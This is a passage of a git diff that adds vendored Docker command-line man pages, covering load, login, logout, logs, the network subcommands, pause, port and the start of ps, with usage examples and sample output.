+   Signal to send to the container
+
+# HISTORY
+April 2014, Originally compiled by William Henry (whenry at redhat dot com)
+ based on docker.com source material and internal work.
+June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
diff --git a/vendor/github.com/docker/docker/man/docker-load.1.md b/vendor/github.com/docker/docker/man/docker-load.1.md
new file mode 100644
index 0000000000..b165173047
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/docker-load.1.md
@@ -0,0 +1,56 @@
+% DOCKER(1) Docker User Manuals
+% Docker Community
+% JUNE 2014
+# NAME
+docker-load - Load an image from a tar archive or STDIN
+
+# SYNOPSIS
+**docker load**
+[**--help**]
+[**-i**|**--input**[=*INPUT*]]
+[**-q**|**--quiet**]
+
+# DESCRIPTION
+
+Loads a tarred repository from a file or the standard input stream.
+Restores both images and tags. Write image names or IDs imported it
+standard output stream.
+
+# OPTIONS
+**--help**
+  Print usage statement
+
+**-i**, **--input**=""
+   Read from a tar archive file, instead of STDIN. The tarball may be compressed with gzip, bzip, or xz.
+
+**-q**, **--quiet**
+   Suppress the load progress bar but still outputs the imported images.
+
+# EXAMPLES
+
+    $ docker images
+    REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
+    busybox             latest              769b9341d937        7 weeks ago         2.489 MB
+    $ docker load --input fedora.tar
+    # […]
+    Loaded image: fedora:rawhide
+    # […]
+    Loaded image: fedora:20
+    # […]
+    $ docker images
+    REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
+    busybox             latest              769b9341d937        7 weeks ago         2.489 MB
+    fedora              rawhide             0d20aec6529d        7 weeks ago         387 MB
+    fedora              20                  58394af37342        7 weeks ago         385.5 MB
+    fedora              heisenbug           58394af37342        7 weeks ago         385.5 MB
+    fedora              latest              58394af37342        7 weeks ago         385.5 MB
+
+# See also
+**docker-save(1)** to save one or more images to a tar archive (streamed to STDOUT by default).
+
+# HISTORY
+April 2014, Originally compiled by William Henry (whenry at redhat dot com)
+based on docker.com source material and internal work.
+June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
+July 2015 update by Mary Anthony <mary@docker.com>
+June 2016 update by Vincent Demeester <vincent@sbr.pm>
diff --git a/vendor/github.com/docker/docker/man/docker-login.1.md b/vendor/github.com/docker/docker/man/docker-login.1.md
new file mode 100644
index 0000000000..c0d4f795db
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/docker-login.1.md
@@ -0,0 +1,53 @@
+% DOCKER(1) Docker User Manuals
+% Docker Community
+% JUNE 2014
+# NAME
+docker-login - Log in to a Docker registry.
+
+# SYNOPSIS
+**docker login**
+[**--help**]
+[**-p**|**--password**[=*PASSWORD*]]
+[**-u**|**--username**[=*USERNAME*]]
+[SERVER]
+
+# DESCRIPTION
+Log in to a Docker Registry located on the specified
+`SERVER`.  You can specify a URL or a `hostname` for the `SERVER` value. If you
+do not specify a `SERVER`, the command uses Docker's public registry located at
+`https://registry-1.docker.io/` by default.  To get a username/password for Docker's public registry, create an account on Docker Hub.
+
+`docker login` requires user to use `sudo` or be `root`, except when:
+
+1.  connecting to  a remote daemon, such as a `docker-machine` provisioned `docker engine`.
+2.  user is added to the `docker` group.  This will impact the security of your system; the `docker` group is `root` equivalent.  See [Docker Daemon Attack Surface](https://docs.docker.com/engine/articles/security/#docker-daemon-attack-surface) for details.
+
+You can log into any public or private repository for which you have
+credentials.  When you log in, the command stores encoded credentials in
+`$HOME/.docker/config.json` on Linux or `%USERPROFILE%/.docker/config.json` on Windows.
+
+# OPTIONS
+**--help**
+  Print usage statement
+
+**-p**, **--password**=""
+   Password
+
+**-u**, **--username**=""
+   Username
+
+# EXAMPLES
+
+## Login to a registry on your localhost
+
+    # docker login localhost:8080
+
+# See also
+**docker-logout(1)** to log out from a Docker registry.
+
+# HISTORY
+April 2014, Originally compiled by William Henry (whenry at redhat dot com)
+based on docker.com source material and internal work.
+June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
+April 2015, updated by Mary Anthony for v2 <mary@docker.com>
+November 2015, updated by Sally O'Malley <somalley@redhat.com>
diff --git a/vendor/github.com/docker/docker/man/docker-logout.1.md b/vendor/github.com/docker/docker/man/docker-logout.1.md
new file mode 100644
index 0000000000..a8a4b7c3c0
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/docker-logout.1.md
@@ -0,0 +1,32 @@
+% DOCKER(1) Docker User Manuals
+% Docker Community
+% JUNE 2014
+# NAME
+docker-logout - Log out from a Docker registry.
+
+# SYNOPSIS
+**docker logout**
+[SERVER]
+
+# DESCRIPTION
+Log out of a Docker Registry located on the specified `SERVER`. You can
+specify a URL or a `hostname` for the `SERVER` value. If you do not specify a
+`SERVER`, the command attempts to log you out of Docker's public registry
+located at `https://registry-1.docker.io/` by default.  
+
+# OPTIONS
+There are no available options.
+
+# EXAMPLES
+
+## Log out from a registry on your localhost
+
+    # docker logout localhost:8080
+
+# See also
+**docker-login(1)** to log in to a Docker registry server.
+
+# HISTORY
+June 2014, Originally compiled by Daniel, Dao Quang Minh (daniel at nitrous dot io)
+July 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
+April 2015, updated by Mary Anthony for v2 <mary@docker.com>
diff --git a/vendor/github.com/docker/docker/man/docker-logs.1.md b/vendor/github.com/docker/docker/man/docker-logs.1.md
new file mode 100644
index 0000000000..e70f796e28
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/docker-logs.1.md
@@ -0,0 +1,71 @@
+% DOCKER(1) Docker User Manuals
+% Docker Community
+% JUNE 2014
+# NAME
+docker-logs - Fetch the logs of a container
+
+# SYNOPSIS
+**docker logs**
+[**-f**|**--follow**]
+[**--help**]
+[**--since**[=*SINCE*]]
+[**-t**|**--timestamps**]
+[**--tail**[=*"all"*]]
+CONTAINER
+
+# DESCRIPTION
+The **docker logs** command batch-retrieves whatever logs are present for
+a container at the time of execution. This does not guarantee execution
+order when combined with a docker run (i.e., your run may not have generated
+any logs at the time you execute docker logs).
+
+The **docker logs --follow** command combines commands **docker logs** and
+**docker attach**. It will first return all logs from the beginning and
+then continue streaming new output from the container's stdout and stderr.
+
+**Warning**: This command works only for the **json-file** or **journald**
+logging drivers.
+
+# OPTIONS
+**--help**
+  Print usage statement
+
+**--details**=*true*|*false*
+   Show extra details provided to logs
+
+**-f**, **--follow**=*true*|*false*
+   Follow log output. The default is *false*.
+
+**--since**=""
+   Show logs since timestamp
+
+**-t**, **--timestamps**=*true*|*false*
+   Show timestamps. The default is *false*.
+
+**--tail**="*all*"
+   Output the specified number of lines at the end of logs (defaults to all logs)
+
+The `--since` option can be Unix timestamps, date formatted timestamps, or Go
+duration strings (e.g. `10m`, `1h30m`) computed relative to the client machine's
+time. Supported formats for date formatted time stamps include RFC3339Nano,
+RFC3339, `2006-01-02T15:04:05`, `2006-01-02T15:04:05.999999999`,
+`2006-01-02Z07:00`, and `2006-01-02`. The local timezone on the client will be
+used if you do not provide either a `Z` or a `+-00:00` timezone offset at the
+end of the timestamp.  When providing Unix timestamps enter
+seconds[.nanoseconds], where seconds is the number of seconds that have elapsed
+since January 1, 1970 (midnight UTC/GMT), not counting leap  seconds (aka Unix
+epoch or Unix time), and the optional .nanoseconds field is a fraction of a
+second no more than nine digits long. You can combine the `--since` option with
+either or both of the `--follow` or `--tail` options.
+
+The `docker logs --details` command will add on extra attributes, such as
+environment variables and labels, provided to `--log-opt` when creating the
+container.
+
+# HISTORY
+April 2014, Originally compiled by William Henry (whenry at redhat dot com)
+based on docker.com source material and internal work.
+June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
+July 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
+April 2015, updated by Ahmet Alp Balkan <ahmetalpbalkan@gmail.com>
+October 2015, updated by Mike Brown <mikebrow@gmail.com>
diff --git a/vendor/github.com/docker/docker/man/docker-network-connect.1.md b/vendor/github.com/docker/docker/man/docker-network-connect.1.md
new file mode 100644
index 0000000000..096ec77a4d
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/docker-network-connect.1.md
@@ -0,0 +1,66 @@
+% DOCKER(1) Docker User Manuals
+% Docker Community
+% OCT 2015
+# NAME
+docker-network-connect - connect a container to a network
+
+# SYNOPSIS
+**docker network connect**
+[**--help**]
+NETWORK CONTAINER
+
+# DESCRIPTION
+
+Connects a container to a network. You can connect a container by name
+or by ID. Once connected, the container can communicate with other containers in
+the same network.
+
+```bash
+$ docker network connect multi-host-network container1
+```
+
+You can also use the `docker run --network=<network-name>` option to start a container and immediately connect it to a network.
+
+```bash
+$ docker run -itd --network=multi-host-network --ip 172.20.88.22 --ip6 2001:db8::8822 busybox
+```
+You can pause, restart, and stop containers that are connected to a network.
+A container connects to its configured networks when it runs.
+
+If specified, the container's IP address(es) is reapplied when a stopped
+container is restarted. If the IP address is no longer available, the container
+fails to start. One way to guarantee that the IP address is available is
+to specify an `--ip-range` when creating the network, and choose the static IP
+address(es) from outside that range. This ensures that the IP address is not
+given to another container while this container is not on the network.
+
+```bash
+$ docker network create --subnet 172.20.0.0/16 --ip-range 172.20.240.0/20 multi-host-network
+```
+
+```bash
+$ docker network connect --ip 172.20.128.2 multi-host-network container2
+```
+
+To verify the container is connected, use the `docker network inspect` command. Use `docker network disconnect` to remove a container from the network.
+
+Once connected in network, containers can communicate using only another
+container's IP address or name. For `overlay` networks or custom plugins that
+support multi-host connectivity, containers connected to the same multi-host
+network but launched from different Engines can also communicate in this way.
+
+You can connect a container to one or more networks. The networks need not be the same type. For example, you can connect a single container bridge and overlay networks.
+
+
+# OPTIONS
+**NETWORK**
+  Specify network name
+
+**CONTAINER**
+  Specify container name
+
+**--help**
+  Print usage statement
+
+# HISTORY
+OCT 2015, created by Mary Anthony <mary@docker.com>
diff --git a/vendor/github.com/docker/docker/man/docker-network-create.1.md b/vendor/github.com/docker/docker/man/docker-network-create.1.md
new file mode 100644
index 0000000000..44ce8e15c2
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/docker-network-create.1.md
@@ -0,0 +1,187 @@
+% DOCKER(1) Docker User Manuals
+% Docker Community
+% OCT 2015
+# NAME
+docker-network-create - create a new network
+
+# SYNOPSIS
+**docker network create**
+[**--attachable**]
+[**--aux-address**=*map[]*]
+[**-d**|**--driver**=*DRIVER*]
+[**--gateway**=*[]*]
+[**--help**]
+[**--internal**]
+[**--ip-range**=*[]*]
+[**--ipam-driver**=*default*]
+[**--ipam-opt**=*map[]*]
+[**--ipv6**]
+[**--label**[=*[]*]]
+[**-o**|**--opt**=*map[]*]
+[**--subnet**=*[]*]
+NETWORK-NAME
+
+# DESCRIPTION
+
+Creates a new network. The `DRIVER` accepts `bridge` or `overlay` which are the
+built-in network drivers. If you have installed a third party or your own custom
+network driver you can specify that `DRIVER` here also. If you don't specify the
+`--driver` option, the command automatically creates a `bridge` network for you.
+When you install Docker Engine it creates a `bridge` network automatically. This
+network corresponds to the `docker0` bridge that Engine has traditionally relied
+on. When launch a new container with  `docker run` it automatically connects to
+this bridge network. You cannot remove this default bridge network but you can
+create new ones using the `network create` command.
+
+```bash
+$ docker network create -d bridge my-bridge-network
+```
+
+Bridge networks are isolated networks on a single Engine installation. If you
+want to create a network that spans multiple Docker hosts each running an
+Engine, you must create an `overlay` network. Unlike `bridge` networks overlay
+networks require some pre-existing conditions before you can create one. These
+conditions are:
+
+* Access to a key-value store. Engine supports Consul, Etcd, and Zookeeper (Distributed store) key-value stores.
+* A cluster of hosts with connectivity to the key-value store.
+* A properly configured Engine `daemon` on each host in the cluster.
+
+The `dockerd` options that support the `overlay` network are:
+
+* `--cluster-store`
+* `--cluster-store-opt`
+* `--cluster-advertise`
+
+To read more about these options and how to configure them, see ["*Get started
+with multi-host
+network*"](https://docs.docker.com/engine/userguide/networking/get-started-overlay/).
+
+It is also a good idea, though not required, that you install Docker Swarm on to
+manage the cluster that makes up your network. Swarm provides sophisticated
+discovery and server management that can assist your implementation.
+
+Once you have prepared the `overlay` network prerequisites you simply choose a
+Docker host in the cluster and issue the following to create the network:
+
+```bash
+$ docker network create -d overlay my-multihost-network
+```
+
+Network names must be unique. The Docker daemon attempts to identify naming
+conflicts but this is not guaranteed. It is the user's responsibility to avoid
+name conflicts.
+
+## Connect containers
+
+When you start a container use the `--network` flag to connect it to a network.
+This adds the `busybox` container to the `mynet` network.
+
+```bash
+$ docker run -itd --network=mynet busybox
+```
+
+If you want to add a container to a network after the container is already
+running use the `docker network connect` subcommand.
+
+You can connect multiple containers to the same network. Once connected, the
+containers can communicate using only another container's IP address or name.
+For `overlay` networks or custom plugins that support multi-host connectivity,
+containers connected to the same multi-host network but launched from different
+Engines can also communicate in this way.
+
+You can disconnect a container from a network using the `docker network
+disconnect` command.
+
+## Specifying advanced options
+
+When you create a network, Engine creates a non-overlapping subnetwork for the
+network by default. This subnetwork is not a subdivision of an existing network.
+It is purely for ip-addressing purposes. You can override this default and
+specify subnetwork values directly using the `--subnet` option. On a
+`bridge` network you can only create a single subnet:
+
+```bash
+$ docker network create -d bridge --subnet=192.168.0.0/16 br0
+```
+
+Additionally, you also specify the `--gateway` `--ip-range` and `--aux-address`
+options.
+
+```bash
+$ docker network create \
+  --driver=bridge \
+  --subnet=172.28.0.0/16 \
+  --ip-range=172.28.5.0/24 \
+  --gateway=172.28.5.254 \
+  br0
+```
+
+If you omit the `--gateway` flag the Engine selects one for you from inside a
+preferred pool. For `overlay` networks and for network driver plugins that
+support it you can create multiple subnetworks.
+
+```bash
+$ docker network create -d overlay \
+  --subnet=192.168.0.0/16 \
+  --subnet=192.170.0.0/16 \
+  --gateway=192.168.0.100 \ 
+  --gateway=192.170.0.100 \
+  --ip-range=192.168.1.0/24 \
+  --aux-address="my-router=192.168.1.5" --aux-address="my-switch=192.168.1.6" \
+  --aux-address="my-printer=192.170.1.5" --aux-address="my-nas=192.170.1.6" \
+  my-multihost-network
+```
+
+Be sure that your subnetworks do not overlap. If they do, the network create
+fails and Engine returns an error.
+
+### Network internal mode
+
+By default, when you connect a container to an `overlay` network, Docker also
+connects a bridge network to it to provide external connectivity. If you want
+to create an externally isolated `overlay` network, you can specify the
+`--internal` option.
+
+# OPTIONS
+**--attachable**
+  Enable manual container attachment
+
+**--aux-address**=map[]
+  Auxiliary IPv4 or IPv6 addresses used by network driver
+
+**-d**, **--driver**=*DRIVER*
+  Driver to manage the Network bridge or overlay. The default is bridge.
+
+**--gateway**=[]
+  IPv4 or IPv6 Gateway for the master subnet
+
+**--help**
+  Print usage
+
+**--internal**
+  Restrict external access to the network
+
+**--ip-range**=[]
+  Allocate container ip from a sub-range
+
+**--ipam-driver**=*default*
+  IP Address Management Driver
+
+**--ipam-opt**=map[]
+  Set custom IPAM driver options
+
+**--ipv6**
+  Enable IPv6 networking
+
+**--label**=*label*
+   Set metadata for a network
+
+**-o**, **--opt**=map[]
+  Set custom driver options
+
+**--subnet**=[]
+  Subnet in CIDR format that represents a network segment
+
+# HISTORY
+OCT 2015, created by Mary Anthony <mary@docker.com>
diff --git a/vendor/github.com/docker/docker/man/docker-network-disconnect.1.md b/vendor/github.com/docker/docker/man/docker-network-disconnect.1.md
new file mode 100644
index 0000000000..09bcac51b0
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/docker-network-disconnect.1.md
@@ -0,0 +1,36 @@
+% DOCKER(1) Docker User Manuals
+% Docker Community
+% OCT 2015
+# NAME
+docker-network-disconnect - disconnect a container from a network
+
+# SYNOPSIS
+**docker network disconnect**
+[**--help**]
+[**--force**]
+NETWORK CONTAINER
+
+# DESCRIPTION
+
+Disconnects a container from a network.
+
+```bash
+  $ docker network disconnect multi-host-network container1
+```
+
+
+# OPTIONS
+**NETWORK**
+  Specify network name
+
+**CONTAINER**
+    Specify container name
+
+**--force**
+  Force the container to disconnect from a network
+
+**--help**
+  Print usage statement
+
+# HISTORY
+OCT 2015, created by Mary Anthony <mary@docker.com>
diff --git a/vendor/github.com/docker/docker/man/docker-network-inspect.1.md b/vendor/github.com/docker/docker/man/docker-network-inspect.1.md
new file mode 100644
index 0000000000..f27c98cb34
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/docker-network-inspect.1.md
@@ -0,0 +1,112 @@
+% DOCKER(1) Docker User Manuals
+% Docker Community
+% OCT 2015
+# NAME
+docker-network-inspect - inspect a network
+
+# SYNOPSIS
+**docker network inspect**
+[**-f**|**--format**[=*FORMAT*]]
+[**--help**]
+NETWORK [NETWORK...]
+
+# DESCRIPTION
+
+Returns information about one or more networks. By default, this command renders all results in a JSON object. For example, if you connect two containers to the default `bridge` network:
+
+```bash
+$ sudo docker run -itd --name=container1 busybox
+f2870c98fd504370fb86e59f32cd0753b1ac9b69b7d80566ffc7192a82b3ed27
+
+$ sudo docker run -itd --name=container2 busybox
+bda12f8922785d1f160be70736f26c1e331ab8aaf8ed8d56728508f2e2fd4727
+```
+
+The `network inspect` command shows the containers, by id, in its
+results. You can specify an alternate format to execute a given
+template for each result. Go's
+[text/template](http://golang.org/pkg/text/template/) package
+describes all the details of the format.
+
+```bash
+$ sudo docker network inspect bridge
+[
+    {
+        "Name": "bridge",
+        "Id": "b2b1a2cba717161d984383fd68218cf70bbbd17d328496885f7c921333228b0f",
+        "Scope": "local",
+        "Driver": "bridge",
+        "IPAM": {
+            "Driver": "default",
+            "Config": [
+                {
+                    "Subnet": "172.17.42.1/16",
+                    "Gateway": "172.17.42.1"
+                }
+            ]
+        },
+        "Internal": false,
+        "Containers": {
+            "bda12f8922785d1f160be70736f26c1e331ab8aaf8ed8d56728508f2e2fd4727": {
+                "Name": "container2",
+                "EndpointID": "0aebb8fcd2b282abe1365979536f21ee4ceaf3ed56177c628eae9f706e00e019",
+                "MacAddress": "02:42:ac:11:00:02",
+                "IPv4Address": "172.17.0.2/16",
+                "IPv6Address": ""
+            },
+            "f2870c98fd504370fb86e59f32cd0753b1ac9b69b7d80566ffc7192a82b3ed27": {
+                "Name": "container1",
+                "EndpointID": "a00676d9c91a96bbe5bcfb34f705387a33d7cc365bac1a29e4e9728df92d10ad",
+                "MacAddress": "02:42:ac:11:00:01",
+                "IPv4Address": "172.17.0.1/16",
+                "IPv6Address": ""
+            }
+        },
+        "Options": {
+            "com.docker.network.bridge.default_bridge": "true",
+            "com.docker.network.bridge.enable_icc": "true",
+            "com.docker.network.bridge.enable_ip_masquerade": "true",
+            "com.docker.network.bridge.host_binding_ipv4": "0.0.0.0",
+            "com.docker.network.bridge.name": "docker0",
+            "com.docker.network.driver.mtu": "1500"
+        }
+    }
+]
+```
+
+Returns the information about the user-defined network:
+
+```bash
+$ docker network create simple-network
+69568e6336d8c96bbf57869030919f7c69524f71183b44d80948bd3927c87f6a
+$ docker network inspect simple-network
+[
+    {
+        "Name": "simple-network",
+        "Id": "69568e6336d8c96bbf57869030919f7c69524f71183b44d80948bd3927c87f6a",
+        "Scope": "local",
+        "Driver": "bridge",
+        "IPAM": {
+            "Driver": "default",
+            "Config": [
+                {
+                    "Subnet": "172.22.0.0/16",
+                    "Gateway": "172.22.0.1"
+                }
+            ]
+        },
+        "Containers": {},
+        "Options": {}
+    }
+]
+```
+
+# OPTIONS
+**-f**, **--format**=""
+  Format the output using the given Go template.
+
+**--help**
+  Print usage statement
+
+# HISTORY
+OCT 2015, created by Mary Anthony <mary@docker.com>
diff --git a/vendor/github.com/docker/docker/man/docker-network-ls.1.md b/vendor/github.com/docker/docker/man/docker-network-ls.1.md
new file mode 100644
index 0000000000..f319e66035
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/docker-network-ls.1.md
@@ -0,0 +1,188 @@
+% DOCKER(1) Docker User Manuals
+% Docker Community
+% OCT 2015
+# NAME
+docker-network-ls - list networks
+
+# SYNOPSIS
+**docker network ls**
+[**-f**|**--filter**[=*[]*]]
+[**--format**=*"TEMPLATE"*]
+[**--no-trunc**[=*true*|*false*]]
+[**-q**|**--quiet**[=*true*|*false*]]
+[**--help**]
+
+# DESCRIPTION
+
+Lists all the networks the Engine `daemon` knows about. This includes the
+networks that span across multiple hosts in a cluster, for example:
+
+```bash
+    $ docker network ls
+    NETWORK ID          NAME                DRIVER          SCOPE
+    7fca4eb8c647        bridge              bridge          local
+    9f904ee27bf5        none                null            local
+    cf03ee007fb4        host                host            local
+    78b03ee04fc4        multi-host          overlay         swarm
+```
+
+Use the `--no-trunc` option to display the full network id:
+
+```bash
+$ docker network ls --no-trunc
+NETWORK ID                                                         NAME                DRIVER
+18a2866682b85619a026c81b98a5e375bd33e1b0936a26cc497c283d27bae9b3   none                null                
+c288470c46f6c8949c5f7e5099b5b7947b07eabe8d9a27d79a9cbf111adcbf47   host                host                
+7b369448dccbf865d397c8d2be0cda7cf7edc6b0945f77d2529912ae917a0185   bridge              bridge              
+95e74588f40db048e86320c6526440c504650a1ff3e9f7d60a497c4d2163e5bd   foo                 bridge    
+63d1ff1f77b07ca51070a8c227e962238358bd310bde1529cf62e6c307ade161   dev                 bridge
+```
+
+## Filtering
+
+The filtering flag (`-f` or `--filter`) format is a `key=value` pair. If there
+is more than one filter, then pass multiple flags (e.g. `--filter "foo=bar" --filter "bif=baz"`).
+Multiple filter flags are combined as an `OR` filter. For example, 
+`-f type=custom -f type=builtin` returns both `custom` and `builtin` networks.
+
+The currently supported filters are:
+
+* driver
+* id (network's id)
+* label (`label=<key>` or `label=<key>=<value>`)
+* name (network's name)
+* type (custom|builtin)
+
+#### Driver
+
+The `driver` filter matches networks based on their driver.
+
+The following example matches networks with the `bridge` driver:
+
+```bash
+$ docker network ls --filter driver=bridge
+NETWORK ID          NAME                DRIVER
+db9db329f835        test1               bridge
+f6e212da9dfd        test2               bridge
+```
+
+#### ID
+
+The `id` filter matches on all or part of a network's ID.
+
+The following filter matches all networks with an ID containing the
+`63d1ff1f77b0...` string.
+
+```bash
+$ docker network ls --filter id=63d1ff1f77b07ca51070a8c227e962238358bd310bde1529cf62e6c307ade161
+NETWORK ID          NAME                DRIVER
+63d1ff1f77b0        dev                 bridge
+```
+
+You can also filter for a substring in an ID as this shows:
+
+```bash
+$ docker network ls --filter id=95e74588f40d
+NETWORK ID          NAME                DRIVER
+95e74588f40d        foo                 bridge
+
+$ docker network ls --filter id=95e
+NETWORK ID          NAME                DRIVER
+95e74588f40d        foo                 bridge
+```
+
+#### Label
+
+The `label` filter matches networks based on the presence of a `label` alone or a `label` and a
+value.
+
+The following filter matches networks with the `usage` label regardless of its value.
+
+```bash
+$ docker network ls -f "label=usage"
+NETWORK ID          NAME                DRIVER
+db9db329f835        test1               bridge              
+f6e212da9dfd        test2               bridge
+```
+
+The following filter matches networks with the `usage` label with the `prod` value.
+
+```bash
+$ docker network ls -f "label=usage=prod"
+NETWORK ID          NAME                DRIVER
+f6e212da9dfd        test2               bridge
+```
+
+#### Name
+
+The `name` filter matches on all or part of a network's name.
+
+The following filter matches all networks with a name containing the `foobar` string.
+
+```bash
+$ docker network ls --filter name=foobar
+NETWORK ID          NAME                DRIVER
+06e7eef0a170        foobar              bridge
+```
+
+You can also filter for a substring in a name as this shows:
+
+```bash
+$ docker network ls --filter name=foo
+NETWORK ID          NAME                DRIVER
+95e74588f40d        foo                 bridge
+06e7eef0a170        foobar              bridge
+```
+
+#### Type
+
+The `type` filter supports two values; `builtin` displays predefined networks
+(`bridge`, `none`, `host`), whereas `custom` displays user defined networks.
+
+The following filter matches all user defined networks:
+
+```bash
+$ docker network ls --filter type=custom
+NETWORK ID          NAME                DRIVER
+95e74588f40d        foo                 bridge
+63d1ff1f77b0        dev                 bridge
+```
+
+By having this flag it allows for batch cleanup. For example, use this filter
+to delete all user defined networks:
+
+```bash
+$ docker network rm `docker network ls --filter type=custom -q`
+```
+
+A warning will be issued when trying to remove a network that has containers
+attached.
+
+# OPTIONS
+
+**-f**, **--filter**=*[]*
+  filter output based on conditions provided. 
+
+**--format**="*TEMPLATE*"
+  Pretty-print networks using a Go template.
+  Valid placeholders:
+     .ID - Network ID
+     .Name - Network name
+     .Driver - Network driver
+     .Scope - Network scope (local, global)
+     .IPv6 - Whether IPv6 is enabled on the network or not
+     .Internal - Whether the network is internal or not
+     .Labels - All labels assigned to the network
+     .Label - Value of a specific label for this network. For example `{{.Label "project.version"}}`
+
+**--no-trunc**=*true*|*false*
+  Do not truncate the output
+
+**-q**, **--quiet**=*true*|*false*
+  Only display network IDs
+
+**--help**
+  Print usage statement
+
+# HISTORY
+OCT 2015, created by Mary Anthony <mary@docker.com>
diff --git a/vendor/github.com/docker/docker/man/docker-network-rm.1.md b/vendor/github.com/docker/docker/man/docker-network-rm.1.md
new file mode 100644
index 0000000000..c094a15286
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/docker-network-rm.1.md
@@ -0,0 +1,43 @@
+% DOCKER(1) Docker User Manuals
+% Docker Community
+% OCT 2015
+# NAME
+docker-network-rm - remove one or more networks
+
+# SYNOPSIS
+**docker network rm** 
+[**--help**]
+NETWORK [NETWORK...]
+
+# DESCRIPTION
+
+Removes one or more networks by name or identifier. To remove a network,
+you must first disconnect any containers connected to it.
+To remove the network named 'my-network':
+
+```bash
+  $ docker network rm my-network
+```
+
+To delete multiple networks in a single `docker network rm` command, provide
+multiple network names or ids. The following example deletes a network with id
+`3695c422697f` and a network named `my-network`:
+
+```bash
+  $ docker network rm 3695c422697f my-network
+```
+
+When you specify multiple networks, the command attempts to delete each in turn.
+If the deletion of one network fails, the command continues to the next on the
+list and tries to delete that. The command reports success or failure for each
+deletion.
+
+# OPTIONS
+**NETWORK**
+  Specify network name or id
+
+**--help**
+  Print usage statement
+
+# HISTORY
+OCT 2015, created by Mary Anthony <mary@docker.com>
diff --git a/vendor/github.com/docker/docker/man/docker-pause.1.md b/vendor/github.com/docker/docker/man/docker-pause.1.md
new file mode 100644
index 0000000000..11eef5321f
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/docker-pause.1.md
@@ -0,0 +1,32 @@
+% DOCKER(1) Docker User Manuals
+% Docker Community
+% JUNE 2014
+# NAME
+docker-pause - Pause all processes within one or more containers
+
+# SYNOPSIS
+**docker pause**
+CONTAINER [CONTAINER...]
+
+# DESCRIPTION
+
+The `docker pause` command suspends all processes in the specified containers.
+On Linux, this uses the cgroups freezer. Traditionally, when suspending a process
+the `SIGSTOP` signal is used, which is observable by the process being suspended.
+With the cgroups freezer the process is unaware, and unable to capture,
+that it is being suspended, and subsequently resumed. On Windows, only Hyper-V
+containers can be paused.
+
+See the [cgroups freezer documentation]
+(https://www.kernel.org/doc/Documentation/cgroup-v1/freezer-subsystem.txt) for
+further details.
+
+# OPTIONS
+**--help**
+  Print usage statement
+
+# See also
+**docker-unpause(1)** to unpause all processes within one or more containers.
+
+# HISTORY
+June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
diff --git a/vendor/github.com/docker/docker/man/docker-port.1.md b/vendor/github.com/docker/docker/man/docker-port.1.md
new file mode 100644
index 0000000000..83e9cf93b6
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/docker-port.1.md
@@ -0,0 +1,47 @@
+% DOCKER(1) Docker User Manuals
+% Docker Community
+% JUNE 2014
+# NAME
+docker-port - List port mappings for the CONTAINER, or lookup the public-facing port that is NAT-ed to the PRIVATE_PORT
+
+# SYNOPSIS
+**docker port**
+[**--help**]
+CONTAINER [PRIVATE_PORT[/PROTO]]
+
+# DESCRIPTION
+List port mappings for the CONTAINER, or lookup the public-facing port that is NAT-ed to the PRIVATE_PORT
+
+# OPTIONS
+**--help**
+  Print usage statement
+
+# EXAMPLES
+
+    # docker ps
+    CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS              PORTS                                            NAMES
+    b650456536c7        busybox:latest      top                 54 minutes ago      Up 54 minutes       0.0.0.0:1234->9876/tcp, 0.0.0.0:4321->7890/tcp   test
+
+## Find out all the ports mapped
+
+    # docker port test
+    7890/tcp -> 0.0.0.0:4321
+    9876/tcp -> 0.0.0.0:1234
+
+## Find out a specific mapping
+
+    # docker port test 7890/tcp
+    0.0.0.0:4321
+
+    # docker port test 7890
+    0.0.0.0:4321
+
+## An example showing error for non-existent mapping
+
+    # docker port test 7890/udp
+    2014/06/24 11:53:36 Error: No public port '7890/udp' published for test
+
+# HISTORY
+April 2014, Originally compiled by William Henry (whenry at redhat dot com)
+June 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
+November 2014, updated by Sven Dowideit <SvenDowideit@home.org.au>
diff --git a/vendor/github.com/docker/docker/man/docker-ps.1.md b/vendor/github.com/docker/docker/man/docker-ps.1.md
new file mode 100644
index 0000000000..d9aa39f8fd
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/docker-ps.1.md
@@ -0,0 +1,145 @@
+% DOCKER(1) Docker User Manuals
+% Docker Community
+% FEBRUARY 2015
+# NAME
+docker-ps - List containers
+
+# SYNOPSIS
+**docker ps**
+[**-a**|**--all**]
+[**-f**|**--filter**[=*[]*]]
+[**--format**=*"TEMPLATE"*]
+[**--help**]
+[**-l**|**--latest**]
+[**-n**[=*-1*]]
+[**--no-trunc**]
+[**-q**|**--quiet**]
+[**-s**|**--size**]
+
+# DESCRIPTION
+
+List the containers in the local repository. By default this shows only
+the running containers.
+
+# OPTIONS
+**-a**, **--all**=*true*|*false*
+   Show all containers. Only running containers are shown by default. The default is *false*.
+
+**-f**, **--filter**=[]
+   Filter output based on these conditions:
+   - exited=<int> an exit code of <int>
+   - label=<key> or label=<key>=<value>
+   - status=(created|restarting|running|paused|exited|dead)
+   - name=<string> a container's name
+   - id=<ID> a container's ID
+   - is-task=(true|false) - containers that are a task (part of a service managed by swarm)
+   - before=(<container-name>|<container-id>)
+   - since=(<container-name>|<container-id>)
+   - ancestor=(<image-name>[:tag]|<image-id>|<image@digest>) - containers created from an image or a descendant.
+   - volume=(<volume-name>|<mount-point-destination>)
+   - network=(<network-name>|<network-id>) - containers connected to the provided network
